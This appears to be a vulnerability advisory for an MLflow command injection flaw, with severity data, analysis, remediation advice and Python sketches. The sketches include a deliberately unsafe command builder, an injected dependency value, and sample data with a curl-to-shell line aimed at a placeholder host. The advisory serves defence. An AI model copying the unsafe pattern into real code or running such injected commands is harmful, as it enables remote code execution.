CVE-2025-15379

EUVD-2025-209121 CRITICAL
2026-03-30 @huntr_ai GHSA-r23q-823p-vmf7
10.0
CVSS 3.0

CVSS Vector

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
None
Scope
Changed
Confidentiality
High
Integrity
High
Availability
High

Lifecycle Timeline

Patch Released
Apr 01, 2026 - 02:30 nvd
Patch available
EUVD ID Assigned
Mar 30, 2026 - 07:30 euvd
EUVD-2025-209121
Analysis Generated
Mar 30, 2026 - 07:30 vuln.today
CVE Published
Mar 30, 2026 - 07:16 nvd
CRITICAL 10.0

Description

A command injection vulnerability exists in MLflow's model serving container initialization code, specifically in the `_install_model_dependencies_to_env()` function. When deploying a model with `env_manager=LOCAL`, MLflow reads dependency specifications from the model artifact's `python_env.yaml` file and directly interpolates them into a shell command without sanitization. This allows an attacker to supply a malicious model artifact and achieve arbitrary command execution on systems that deploy the model. The vulnerability affects version 3.8.0 and is fixed in version 3.8.2.
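The injection point can be illustrated with a minimal sketch. The function names below are hypothetical simplifications, not MLflow's actual code: a dependency string carrying a shell metacharacter survives naive string interpolation, but quoting neutralizes it.

```python
import shlex

def build_install_cmd_unsafe(deps):
    # Vulnerable pattern: dependency strings (as read from a model
    # artifact's python_env.yaml) are concatenated into a shell
    # command string with no sanitization.
    return "pip install " + " ".join(deps)

def build_install_cmd_safe(deps):
    # Quoting each value makes shell metacharacters literal.
    return "pip install " + " ".join(shlex.quote(d) for d in deps)

deps = ["numpy==1.26.0; echo INJECTED"]
print(build_install_cmd_unsafe(deps))
# pip install numpy==1.26.0; echo INJECTED    <- the shell sees two commands
print(build_install_cmd_safe(deps))
# pip install 'numpy==1.26.0; echo INJECTED'  <- one literal argument
```

If the unsafe string were passed to a shell, everything after the semicolon would execute as a separate command.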

Analysis

Critical command injection in MLflow 3.8.0 enables remote code execution during model deployment when attackers supply malicious artifacts deployed with the env_manager=LOCAL parameter. The _install_model_dependencies_to_env() function unsafely interpolates dependency specifications from python_env.yaml directly into shell commands without sanitization. With a CVSS score of 10.0 (network-accessible, no authentication, low complexity) and publicly available exploit details (reported via the Huntr bug bounty program, patched in 3.8.2), this represents an immediate critical risk for organizations running MLflow model serving infrastructure. EPSS data is not yet available, but the exploitation scenario is straightforward for adversaries with model deployment access.

Technical Context

MLflow is an open-source machine learning lifecycle platform that manages model deployment, serving, and dependency management. The vulnerability resides in the environment manager subsystem that handles Python dependency installation. When `env_manager=LOCAL` is specified during model deployment, MLflow parses the `python_env.yaml` file from model artifacts to determine required dependencies. The vulnerable function constructs shell commands by directly concatenating user-controlled dependency strings without input validation or command sanitization. This represents CWE-77 (Command Injection), a critical flaw class in which externally influenced input modifies the intended command string. The affected release, MLflow 3.8.0, uses Python's subprocess or shell invocation mechanisms that interpret special characters and command separators (semicolons, pipes, backticks), allowing attackers to inject arbitrary commands. Model artifacts in MLflow are typically stored as directories containing metadata files, making the `python_env.yaml` file a trusted input surface that was incorrectly assumed safe.
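The shell-interpretation behavior described above can be reproduced safely with a harmless echo payload. This sketch is purely illustrative and does not touch MLflow itself; it contrasts `shell=True` string invocation with an argument-vector call.

```python
import subprocess

payload = "hello; echo INJECTED"

# shell=True: the string is handed to /bin/sh, so ';' splits it into
# two commands and the second one executes.
out_shell = subprocess.run("echo " + payload, shell=True,
                           capture_output=True, text=True).stdout

# Argument vector: no shell is involved, so the entire payload is
# passed to echo as one literal argument.
out_list = subprocess.run(["echo", payload],
                          capture_output=True, text=True).stdout

print(repr(out_shell))  # 'hello\nINJECTED\n'  -> two commands ran
print(repr(out_list))   # 'hello; echo INJECTED\n' -> one literal string
```

Passing an argument list rather than a shell string is the standard defense against this flaw class, alongside quoting with `shlex.quote()` when a shell is unavoidable.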

Affected Products

The vulnerability affects MLflow version 3.8.0 specifically, identified under CPE `cpe:2.3:a:mlflow:mlflow:*:*:*:*:*:*:*:*`. MLflow is an open-source machine learning operations platform developed by Databricks and widely deployed across data science and ML engineering environments. Organizations running MLflow model serving infrastructure with version 3.8.0 are vulnerable when deploying models that specify env_manager=LOCAL in their configuration. The vulnerability is isolated to this single version, as the issue was introduced and fixed within a tight release window. Detailed vulnerability disclosure and patch information are available at the Huntr bounty platform (https://huntr.com/bounties/dc9c1c20-7879-4050-87df-4d095fe5ca75) and in the fix commit in the MLflow GitHub repository (https://github.com/mlflow/mlflow/commit/361b6f620adf98385c6721e384fb5ef9a30bb05e).
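Since only one release is affected, operators can script a quick local check. The `status_for` helper and constants below are illustrative, not part of MLflow or the advisory.

```python
from importlib.metadata import PackageNotFoundError, version

AFFECTED = "3.8.0"  # the single affected release
FIXED = "3.8.2"     # first release containing the fix

def status_for(v):
    # Classify an installed version string against this advisory.
    if v == AFFECTED:
        return f"VULNERABLE: mlflow {v} - upgrade to {FIXED} or later"
    return f"mlflow {v}: not the affected release"

try:
    print(status_for(version("mlflow")))
except PackageNotFoundError:
    print("mlflow is not installed in this environment")
```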

Remediation

Organizations must immediately upgrade MLflow to version 3.8.2 or later, which contains the complete fix for the command injection vulnerability as documented in commit 361b6f620adf98385c6721e384fb5ef9a30bb05e. The upstream fix, available in the GitHub repository, implements proper input sanitization in the _install_model_dependencies_to_env() function. For environments where immediate patching is not feasible, implement compensating controls: restrict model deployment permissions to trusted users only, strictly validate model artifacts before deployment, avoid the env_manager=LOCAL parameter if alternative environment managers are viable, and deploy models in isolated, sandboxed containers with minimal privileges. Network segmentation should isolate MLflow model serving infrastructure from untrusted networks. Monitor MLflow deployment logs for suspicious dependency installation patterns or shell metacharacters in python_env.yaml files. Review all model artifacts deployed during the 3.8.0 version window for potential compromise indicators. The complete advisory and technical details are available at https://huntr.com/bounties/dc9c1c20-7879-4050-87df-4d095fe5ca75, with the patch implementation at https://github.com/mlflow/mlflow/commit/361b6f620adf98385c6721e384fb5ef9a30bb05e.
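The artifact-review step can be partially automated. This sketch (the `flag_suspicious_deps` helper is hypothetical, not an MLflow API) scans dependency strings, as they would appear in a `python_env.yaml`, for classic injection metacharacters:

```python
import re

# Flags ';', '&', '|', backticks, newlines, and '$(' command
# substitution. '<' and '>' are deliberately NOT flagged because they
# occur in legitimate pip version specifiers (e.g. "numpy>=1.26"),
# so hits here still need manual review rather than automatic blocking.
SHELL_META = re.compile(r"[;&|`\n]|\$\(")

def flag_suspicious_deps(deps):
    """Return dependency strings that warrant manual review."""
    return [d for d in deps if SHELL_META.search(d)]

deps = [
    "mlflow==3.8.0",
    "numpy>=1.26",
    "requests; curl http://evil.invalid/x | sh",
]
print(flag_suspicious_deps(deps))
# ['requests; curl http://evil.invalid/x | sh']
```

A scan like this is a stopgap for triaging artifacts deployed during the 3.8.0 window; upgrading to 3.8.2 remains the actual fix.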

Priority Score

50
KEV: 0
EPSS: +0.2
CVSS: +50
POC: 0

Vendor Status


